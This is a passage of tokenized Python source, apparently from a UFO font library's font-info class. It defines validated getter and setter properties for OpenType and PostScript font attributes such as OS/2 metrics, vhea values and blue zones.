dirty = True <EOL> openTypeNameWWSFamilyName = property ( _get_openTypeNameWWSFamilyName , _set_openTypeNameWWSFamilyName , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameWWSSubfamilyName ( self ) : <EOL> return self . _openTypeNameWWSSubfamilyName <EOL> def _set_openTypeNameWWSSubfamilyName ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameWWSSubfamilyName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameWWSSubfamilyName = value <EOL> self . dirty = True <EOL> openTypeNameWWSSubfamilyName = property ( _get_openTypeNameWWSSubfamilyName , _set_openTypeNameWWSSubfamilyName , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2CodePageRanges ( self ) : <EOL> return self . _openTypeOS2CodePageRanges <EOL> def _set_openTypeOS2CodePageRanges ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2CodePageRanges = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2CodePageRanges = value <EOL> self . dirty = True <EOL> openTypeOS2CodePageRanges = property ( _get_openTypeOS2CodePageRanges , _set_openTypeOS2CodePageRanges , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2FamilyClass ( self ) : <EOL> return self . _openTypeOS2FamilyClass <EOL> def _set_openTypeOS2FamilyClass ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2FamilyClass = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2FamilyClass = value <EOL> self . 
dirty = True <EOL> openTypeOS2FamilyClass = property ( _get_openTypeOS2FamilyClass , _set_openTypeOS2FamilyClass , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2Panose ( self ) : <EOL> return self . _openTypeOS2Panose <EOL> def _set_openTypeOS2Panose ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2Panose = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2Panose = value <EOL> self . dirty = True <EOL> openTypeOS2Panose = property ( _get_openTypeOS2Panose , _set_openTypeOS2Panose , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2Selection ( self ) : <EOL> return self . _openTypeOS2Selection <EOL> def _set_openTypeOS2Selection ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2Selection = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2Selection = value <EOL> self . dirty = True <EOL> openTypeOS2Selection = property ( _get_openTypeOS2Selection , _set_openTypeOS2Selection , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2StrikeoutPosition ( self ) : <EOL> return self . _openTypeOS2StrikeoutPosition <EOL> def _set_openTypeOS2StrikeoutPosition ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2StrikeoutPosition = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2StrikeoutPosition = value <EOL> self . 
dirty = True <EOL> openTypeOS2StrikeoutPosition = property ( _get_openTypeOS2StrikeoutPosition , _set_openTypeOS2StrikeoutPosition , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2StrikeoutSize ( self ) : <EOL> return self . _openTypeOS2StrikeoutSize <EOL> def _set_openTypeOS2StrikeoutSize ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2StrikeoutSize = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2StrikeoutSize = value <EOL> self . dirty = True <EOL> openTypeOS2StrikeoutSize = property ( _get_openTypeOS2StrikeoutSize , _set_openTypeOS2StrikeoutSize , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2SubscriptXOffset ( self ) : <EOL> return self . _openTypeOS2SubscriptXOffset <EOL> def _set_openTypeOS2SubscriptXOffset ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2SubscriptXOffset = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2SubscriptXOffset = value <EOL> self . dirty = True <EOL> openTypeOS2SubscriptXOffset = property ( _get_openTypeOS2SubscriptXOffset , _set_openTypeOS2SubscriptXOffset , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2SubscriptXSize ( self ) : <EOL> return self . _openTypeOS2SubscriptXSize <EOL> def _set_openTypeOS2SubscriptXSize ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2SubscriptXSize = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2SubscriptXSize = value <EOL> self . 
dirty = True <EOL> openTypeOS2SubscriptXSize = property ( _get_openTypeOS2SubscriptXSize , _set_openTypeOS2SubscriptXSize , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2SubscriptYOffset ( self ) : <EOL> return self . _openTypeOS2SubscriptYOffset <EOL> def _set_openTypeOS2SubscriptYOffset ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2SubscriptYOffset = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2SubscriptYOffset = value <EOL> self . dirty = True <EOL> openTypeOS2SubscriptYOffset = property ( _get_openTypeOS2SubscriptYOffset , _set_openTypeOS2SubscriptYOffset , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2SubscriptYSize ( self ) : <EOL> return self . _openTypeOS2SubscriptYSize <EOL> def _set_openTypeOS2SubscriptYSize ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2SubscriptYSize = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2SubscriptYSize = value <EOL> self . dirty = True <EOL> openTypeOS2SubscriptYSize = property ( _get_openTypeOS2SubscriptYSize , _set_openTypeOS2SubscriptYSize , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2SuperscriptXOffset ( self ) : <EOL> return self . _openTypeOS2SuperscriptXOffset <EOL> def _set_openTypeOS2SuperscriptXOffset ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2SuperscriptXOffset = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2SuperscriptXOffset = value <EOL> self . 
dirty = True <EOL> openTypeOS2SuperscriptXOffset = property ( _get_openTypeOS2SuperscriptXOffset , _set_openTypeOS2SuperscriptXOffset , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2SuperscriptXSize ( self ) : <EOL> return self . _openTypeOS2SuperscriptXSize <EOL> def _set_openTypeOS2SuperscriptXSize ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2SuperscriptXSize = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2SuperscriptXSize = value <EOL> self . dirty = True <EOL> openTypeOS2SuperscriptXSize = property ( _get_openTypeOS2SuperscriptXSize , _set_openTypeOS2SuperscriptXSize , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2SuperscriptYOffset ( self ) : <EOL> return self . _openTypeOS2SuperscriptYOffset <EOL> def _set_openTypeOS2SuperscriptYOffset ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2SuperscriptYOffset = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2SuperscriptYOffset = value <EOL> self . dirty = True <EOL> openTypeOS2SuperscriptYOffset = property ( _get_openTypeOS2SuperscriptYOffset , _set_openTypeOS2SuperscriptYOffset , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2SuperscriptYSize ( self ) : <EOL> return self . _openTypeOS2SuperscriptYSize <EOL> def _set_openTypeOS2SuperscriptYSize ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2SuperscriptYSize = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2SuperscriptYSize = value <EOL> self . 
dirty = True <EOL> openTypeOS2SuperscriptYSize = property ( _get_openTypeOS2SuperscriptYSize , _set_openTypeOS2SuperscriptYSize , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2Type ( self ) : <EOL> return self . _openTypeOS2Type <EOL> def _set_openTypeOS2Type ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2Type = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2Type = value <EOL> self . dirty = True <EOL> openTypeOS2Type = property ( _get_openTypeOS2Type , _set_openTypeOS2Type , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2TypoAscender ( self ) : <EOL> return self . _openTypeOS2TypoAscender <EOL> def _set_openTypeOS2TypoAscender ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2TypoAscender = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2TypoAscender = value <EOL> self . dirty = True <EOL> openTypeOS2TypoAscender = property ( _get_openTypeOS2TypoAscender , _set_openTypeOS2TypoAscender , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2TypoDescender ( self ) : <EOL> return self . _openTypeOS2TypoDescender <EOL> def _set_openTypeOS2TypoDescender ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2TypoDescender = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2TypoDescender = value <EOL> self . dirty = True <EOL> openTypeOS2TypoDescender = property ( _get_openTypeOS2TypoDescender , _set_openTypeOS2TypoDescender , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2TypoLineGap ( self ) : <EOL> return self . 
_openTypeOS2TypoLineGap <EOL> def _set_openTypeOS2TypoLineGap ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2TypoLineGap = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2TypoLineGap = value <EOL> self . dirty = True <EOL> openTypeOS2TypoLineGap = property ( _get_openTypeOS2TypoLineGap , _set_openTypeOS2TypoLineGap , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2UnicodeRanges ( self ) : <EOL> return self . _openTypeOS2UnicodeRanges <EOL> def _set_openTypeOS2UnicodeRanges ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2UnicodeRanges = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2UnicodeRanges = value <EOL> self . dirty = True <EOL> openTypeOS2UnicodeRanges = property ( _get_openTypeOS2UnicodeRanges , _set_openTypeOS2UnicodeRanges , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2VendorID ( self ) : <EOL> return self . _openTypeOS2VendorID <EOL> def _set_openTypeOS2VendorID ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2VendorID = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2VendorID = value <EOL> self . dirty = True <EOL> openTypeOS2VendorID = property ( _get_openTypeOS2VendorID , _set_openTypeOS2VendorID , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2WeightClass ( self ) : <EOL> return self . _openTypeOS2WeightClass <EOL> def _set_openTypeOS2WeightClass ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2WeightClass = None <EOL> else : <EOL> valid = ufoLib . 
validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2WeightClass = value <EOL> self . dirty = True <EOL> openTypeOS2WeightClass = property ( _get_openTypeOS2WeightClass , _set_openTypeOS2WeightClass , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2WidthClass ( self ) : <EOL> return self . _openTypeOS2WidthClass <EOL> def _set_openTypeOS2WidthClass ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2WidthClass = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2WidthClass = value <EOL> self . dirty = True <EOL> openTypeOS2WidthClass = property ( _get_openTypeOS2WidthClass , _set_openTypeOS2WidthClass , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2WinAscent ( self ) : <EOL> return self . _openTypeOS2WinAscent <EOL> def _set_openTypeOS2WinAscent ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2WinAscent = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2WinAscent = value <EOL> self . dirty = True <EOL> openTypeOS2WinAscent = property ( _get_openTypeOS2WinAscent , _set_openTypeOS2WinAscent , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2WinDescent ( self ) : <EOL> return self . _openTypeOS2WinDescent <EOL> def _set_openTypeOS2WinDescent ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2WinDescent = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2WinDescent = value <EOL> self . 
dirty = True <EOL> openTypeOS2WinDescent = property ( _get_openTypeOS2WinDescent , _set_openTypeOS2WinDescent , doc = "<STR_LIT>" ) <EOL> def _get_openTypeVheaCaretOffset ( self ) : <EOL> return self . _openTypeVheaCaretOffset <EOL> def _set_openTypeVheaCaretOffset ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeVheaCaretOffset = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeVheaCaretOffset = value <EOL> self . dirty = True <EOL> openTypeVheaCaretOffset = property ( _get_openTypeVheaCaretOffset , _set_openTypeVheaCaretOffset , doc = "<STR_LIT>" ) <EOL> def _get_openTypeVheaCaretSlopeRise ( self ) : <EOL> return self . _openTypeVheaCaretSlopeRise <EOL> def _set_openTypeVheaCaretSlopeRise ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeVheaCaretSlopeRise = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeVheaCaretSlopeRise = value <EOL> self . dirty = True <EOL> openTypeVheaCaretSlopeRise = property ( _get_openTypeVheaCaretSlopeRise , _set_openTypeVheaCaretSlopeRise , doc = "<STR_LIT>" ) <EOL> def _get_openTypeVheaCaretSlopeRun ( self ) : <EOL> return self . _openTypeVheaCaretSlopeRun <EOL> def _set_openTypeVheaCaretSlopeRun ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeVheaCaretSlopeRun = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeVheaCaretSlopeRun = value <EOL> self . 
dirty = True <EOL> openTypeVheaCaretSlopeRun = property ( _get_openTypeVheaCaretSlopeRun , _set_openTypeVheaCaretSlopeRun , doc = "<STR_LIT>" ) <EOL> def _get_openTypeVheaVertTypoAscender ( self ) : <EOL> return self . _openTypeVheaVertTypoAscender <EOL> def _set_openTypeVheaVertTypoAscender ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeVheaVertTypoAscender = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeVheaVertTypoAscender = value <EOL> self . dirty = True <EOL> openTypeVheaVertTypoAscender = property ( _get_openTypeVheaVertTypoAscender , _set_openTypeVheaVertTypoAscender , doc = "<STR_LIT>" ) <EOL> def _get_openTypeVheaVertTypoDescender ( self ) : <EOL> return self . _openTypeVheaVertTypoDescender <EOL> def _set_openTypeVheaVertTypoDescender ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeVheaVertTypoDescender = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeVheaVertTypoDescender = value <EOL> self . dirty = True <EOL> openTypeVheaVertTypoDescender = property ( _get_openTypeVheaVertTypoDescender , _set_openTypeVheaVertTypoDescender , doc = "<STR_LIT>" ) <EOL> def _get_openTypeVheaVertTypoLineGap ( self ) : <EOL> return self . _openTypeVheaVertTypoLineGap <EOL> def _set_openTypeVheaVertTypoLineGap ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeVheaVertTypoLineGap = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeVheaVertTypoLineGap = value <EOL> self . 
dirty = True <EOL> openTypeVheaVertTypoLineGap = property ( _get_openTypeVheaVertTypoLineGap , _set_openTypeVheaVertTypoLineGap , doc = "<STR_LIT>" ) <EOL> def _get_postscriptBlueFuzz ( self ) : <EOL> return self . _postscriptBlueFuzz <EOL> def _set_postscriptBlueFuzz ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptBlueFuzz = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptBlueFuzz = value <EOL> self . dirty = True <EOL> postscriptBlueFuzz = property ( _get_postscriptBlueFuzz , _set_postscriptBlueFuzz , doc = "<STR_LIT>" ) <EOL> def _get_postscriptBlueScale ( self ) : <EOL> return self . _postscriptBlueScale <EOL> def _set_postscriptBlueScale ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptBlueScale = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptBlueScale = value <EOL> self . dirty = True <EOL> postscriptBlueScale = property ( _get_postscriptBlueScale , _set_postscriptBlueScale , doc = "<STR_LIT>" ) <EOL> def _get_postscriptBlueShift ( self ) : <EOL> return self . _postscriptBlueShift <EOL> def _set_postscriptBlueShift ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptBlueShift = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptBlueShift = value <EOL> self . dirty = True <EOL> postscriptBlueShift = property ( _get_postscriptBlueShift , _set_postscriptBlueShift , doc = "<STR_LIT>" ) <EOL> def _get_postscriptBlueValues ( self ) : <EOL> if self . 
_postscriptBlueValues is None : <EOL> return [ ] <EOL> return self . _postscriptBlueValues <EOL> def _set_postscriptBlueValues ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptBlueValues = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptBlueValues = value <EOL> self . dirty = True <EOL> postscriptBlueValues = property ( _get_postscriptBlueValues , _set_postscriptBlueValues , doc = "<STR_LIT>" ) <EOL> def _get_postscriptDefaultCharacter ( self ) : <EOL> return self . _postscriptDefaultCharacter <EOL> def _set_postscriptDefaultCharacter ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptDefaultCharacter = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptDefaultCharacter = value <EOL> self . dirty = True <EOL> postscriptDefaultCharacter = property ( _get_postscriptDefaultCharacter , _set_postscriptDefaultCharacter , doc = "<STR_LIT>" ) <EOL> def _get_postscriptDefaultWidthX ( self ) : <EOL> return self . _postscriptDefaultWidthX <EOL> def _set_postscriptDefaultWidthX ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptDefaultWidthX = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptDefaultWidthX = value <EOL> self . dirty = True <EOL> postscriptDefaultWidthX = property ( _get_postscriptDefaultWidthX , _set_postscriptDefaultWidthX , doc = "<STR_LIT>" ) <EOL> def _get_postscriptFamilyBlues ( self ) : <EOL> if self . _postscriptFamilyBlues is None : <EOL> return [ ] <EOL> return self . 
_postscriptFamilyBlues <EOL> def _set_postscriptFamilyBlues ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptFamilyBlues = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptFamilyBlues = value <EOL> self . dirty = True <EOL> postscriptFamilyBlues = property ( _get_postscriptFamilyBlues , _set_postscriptFamilyBlues , doc = "<STR_LIT>" ) <EOL> def _get_postscriptFamilyOtherBlues ( self ) : <EOL> if self . _postscriptFamilyOtherBlues is None : <EOL> return [ ] <EOL> return self . _postscriptFamilyOtherBlues <EOL> def _set_postscriptFamilyOtherBlues ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptFamilyOtherBlues = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptFamilyOtherBlues = value <EOL> self . dirty = True <EOL> postscriptFamilyOtherBlues = property ( _get_postscriptFamilyOtherBlues , _set_postscriptFamilyOtherBlues , doc = "<STR_LIT>" ) <EOL> def _get_postscriptFontName ( self ) : <EOL> return self . _postscriptFontName <EOL> def _set_postscriptFontName ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptFontName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptFontName = value <EOL> self . dirty = True <EOL> postscriptFontName = property ( _get_postscriptFontName , _set_postscriptFontName , doc = "<STR_LIT>" ) <EOL> def _get_postscriptForceBold ( self ) : <EOL> return self . _postscriptForceBold <EOL> def _set_postscriptForceBold ( self , value ) : <EOL> if value is None : <EOL> self . 
_postscriptForceBold = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptForceBold = value <EOL> self . dirty = True <EOL> postscriptForceBold = property ( _get_postscriptForceBold , _set_postscriptForceBold , doc = "<STR_LIT>" ) <EOL> def _get_postscriptFullName ( self ) : <EOL> return self . _postscriptFullName <EOL> def _set_postscriptFullName ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptFullName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptFullName = value <EOL> self . dirty = True <EOL> postscriptFullName = property ( _get_postscriptFullName , _set_postscriptFullName , doc = "<STR_LIT>" ) <EOL> def _get_postscriptIsFixedPitch ( self ) : <EOL> return self . _postscriptIsFixedPitch <EOL> def _set_postscriptIsFixedPitch ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptIsFixedPitch = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptIsFixedPitch = value <EOL> self . dirty = True <EOL> postscriptIsFixedPitch = property ( _get_postscriptIsFixedPitch , _set_postscriptIsFixedPitch , doc = "<STR_LIT>" ) <EOL> def _get_postscriptNominalWidthX ( self ) : <EOL> return self . _postscriptNominalWidthX <EOL> def _set_postscriptNominalWidthX ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptNominalWidthX = None <EOL> else : <EOL> valid = ufoLib . 
validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptNominalWidthX = value <EOL> self . dirty = True <EOL> postscriptNominalWidthX = property ( _get_postscriptNominalWidthX , _set_postscriptNominalWidthX , doc = "<STR_LIT>" ) <EOL> def _get_postscriptOtherBlues ( self ) : <EOL> if self . _postscriptOtherBlues is None : <EOL> return [ ] <EOL> return self . _postscriptOtherBlues <EOL> def _set_postscriptOtherBlues ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptOtherBlues = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptOtherBlues = value <EOL> self . dirty = True <EOL> postscriptOtherBlues = property ( _get_postscriptOtherBlues , _set_postscriptOtherBlues , doc = "<STR_LIT>" ) <EOL> def _get_postscriptSlantAngle ( self ) : <EOL> return self . _postscriptSlantAngle <EOL> def _set_postscriptSlantAngle ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptSlantAngle = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % 